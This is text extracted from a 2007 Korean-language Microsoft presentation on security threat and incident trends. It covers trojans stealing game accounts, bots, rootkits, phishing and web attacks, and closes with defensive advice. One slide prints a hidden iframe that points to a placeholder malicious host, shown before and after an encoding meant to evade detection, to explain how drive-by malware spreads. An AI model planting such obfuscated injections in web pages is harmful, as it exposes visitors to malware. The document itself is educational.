최근정보보호위협과 침해사고동향 김홍석보안프로그램매니저고객지원부한국마이크로소프트
해킹으로부터안전하고 바이러스걱정도안하고 보안취약점염려도없이 컴퓨터를가장안전하게사용하는 방법은? 컴퓨터를네트워크에연결하지않고 CD, 디스켓, USB 메모리를사용하지않는다
한국정보보호진흥원 (KISA) 2006. 12. * 정보통신부 Dynamic u-korea 정보보호강화사업결과물
특정정보나서비스를 대상으로한금전적탈취 단순호기심 명예심
출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )
해킹, 바이러스전체피해건수감소 단순홈페이지변조피해감소 위험도증가스팸릴레이증가피싱경유지사고증가
궁극적목적은금전적이익 특정서비스 ( 게임 ) 이용자를대상으로한트로이잔피해가많아짐 특정웹게시판, 자료실등에은닉되어유포 게임 ID 와비밀번호를탈취 아이템사기 대량메일발송웜이줄어듦
루트킷을이용한감염사실은폐 백신프로그램에의한탐지방지 파일, 프로세스, 레지스트리숨김 웜 + 바이러스 + 봇 + 스파이웨어 + 트로이잔융합 악성코드제작은날로쉬워짐
3972 611 746 10764 964 533 2175 기타바이러스트로이잔웜 4117 2005 2006
하루 100 개이상의변종이탐지됨 악성봇관리용 C&C 다중화 루트킷을이용한봇 C&C 은닉 스팸메일발송, 악성코드유포외에금전적보상요구형 (ransom) DDoS
출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )
출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )
출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )
출처 : Microsoft, Microsoft Security Intelligence Report (2006 년 10 월 )
단순홈페이지변조피해감소 웹서버를통한제로데이공격발생 중국으로부터의해킹사고지속 특정정보수집전용악성코드유포 게임또는인지도높은사이트해킹 카페, 블로그를통한악성코드유포 피싱경유지, 스팸릴레이사고지속적증가 기존해킹기법과융합된스파이피싱등으로발전 개인정보탈취
인코딩전 <IFRAME SRC="http://evilsite.xxx/ou t.php?s_id=1" WIDTH=0 HEIGHT=0 BORDER=0 STYLE="display:none"></IFRA ME> 인코딩후 <script type="text/javascript"> xx('%264djgsbnf%2631tsd%264 E%2633iuuq%264B00fwjmtjuf/y yy0pvu/qiq%264gt%60je%264e2 %2633%2631XJEUI%264E1%2631I FJHIU%264E1%2631CPSEFS%264E 1%2631TUZMF%264E%2633ejtqmb z%264bopof%2633%264f%264d0j GSBNF%264F'); </script>
대량스팸메일을통한피싱의보편화 이미지스팸 피싱사이트제작툴킷사용증가 국내개인정보수집목적피싱발생 전화사기대폭증가
귀찮은존재 지우기위해시간을소모함 주의를기울이면피해를보지않는다? 심각한보안위협 반드시대응솔루션을사용해야함
사고건수 금융기관 은행, 보험회사등 전자상거래업체 기타정부기관, 온라인메신저업체, 검색사이트등 2006 년 1 12 월, KISA 에서접수처리한사고분석
기업 3,689 대학 1,094 비영리 714 연구소 16 네트워크 307 기타 20,988 2006 년 1 12 월, KISA 에서접수처리한사고분석
웹사이트이용전파, 금전적목적지속 Windows Vista 보안기능무력화시도 VoIP 악용악성코드출현 특정프로그램취약점겨냥공격증가 사용자를기만하는사회공학기법의악성코드증가 UCC 보안위협등장
SQL injection 취약점, 파일업로드취약점공격지속 Web Proxy 를이용한공격증가 ActiveX 컨트롤이용해킹증가 국내홈페이지대상의 DoS 공격증가웹 20 2.0 환경대응필요 Ajax, SOAP, RSS 등
관공서, 금융기관사칭전화사기지속 호스트파일변조를통하여사용자가알아채기어려워짐 피싱필터보급증가
출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )
운영체제 (OS) 네트워크서버, 웹애플리케이션웹브라우저애드온및플러그인동영상, 음악재생기메일클라이언트인스턴트메신저, 채팅데이터베이스서버압축프로그램파일뷰어문서작성기바이러스백신 네트워크기능파일입출력기능을갖춘거의모든프로그램과시스템에보안과관련한결함이있을가능성
출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )
출처 : Symantec, Symantec Internet Security Threat Report: Volume XI (2007 년 3 월 )
정의 (KrCERT/CC) PC에암호를설정하지않음보안업데이트를하지않음인터넷을통해웜등악성코드에감염되는시간 1,000여회테스트평균 2007 년 3 월현재 Windows XP SP1: 26분 45초 Windows 2000 SP4: 32분 47초 출처 : 한국정보보호진흥원, "2007 년 03 월해킹바이러스통계및분석월보"
1. 다중보안, 심층보안구현 패치관리, 백신, 방화벽, 침입탐지, 침입보호 2. 불필요한서비스중지 3. 외부에제공되는서비스호스트에패치지속설치 4. 보안기준에못미치는클라이언트를네트워크접속시강제차단접속시강제차단 5. 암호정책강화 6 위험가능성이있는메일첨부파일을서버에서 6. 위험가능성이있는메일첨부파일을서버에서차단또는제거
7. 업무에필요한최소권한만할당 8. 긴급보안대응프로세스수립및훈련 9. 임원진에보안예산할당필요역설 10. 외부로나가는 (outbound) 패킷필터링 11. 애플리케이션관리시스템사용 12. 악성소프트웨어에대해직원교육 사회공학기법에대해인지하도록함 IT 관리부서는최신동향파악
1. 자동업데이트켜기 2. 개인방화벽사용 3. 백신소프트웨어사용 주기적으로최신패턴을업데이트 4. 암호강화 5. 믿을수없는출처의메일삭제 6. 의심스런웹사이트방문또는파일다운로드금지
2007 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.